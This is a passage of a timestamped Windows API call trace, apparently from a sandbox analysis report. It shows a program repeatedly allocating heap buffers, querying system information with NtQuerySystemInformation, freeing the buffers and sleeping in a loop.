RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.566] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.567] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.567] Sleep (dwMilliseconds=0x110) [0194.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.586] Sleep (dwMilliseconds=0x110) [0194.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.598] Sleep (dwMilliseconds=0x110) [0194.607] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.607] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.613] Sleep (dwMilliseconds=0x110) [0194.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.630] Sleep (dwMilliseconds=0x110) [0194.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.645] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.646] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.647] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.647] Sleep (dwMilliseconds=0x110) [0194.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.661] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.662] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.662] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.662] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.663] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.663] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.663] Sleep (dwMilliseconds=0x110) [0194.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.678] Sleep (dwMilliseconds=0x110) [0194.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.695] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.695] Sleep (dwMilliseconds=0x110) [0194.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.706] Sleep (dwMilliseconds=0x110) [0194.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.722] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.722] Sleep (dwMilliseconds=0x110) [0194.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.735] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.741] Sleep (dwMilliseconds=0x110) [0194.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.754] Sleep (dwMilliseconds=0x110) [0194.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0194.770] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0194.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.770] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0194.771] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.771] Sleep (dwMilliseconds=0x110) [0194.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0194.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.779] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0194.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0194.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0194.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0194.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 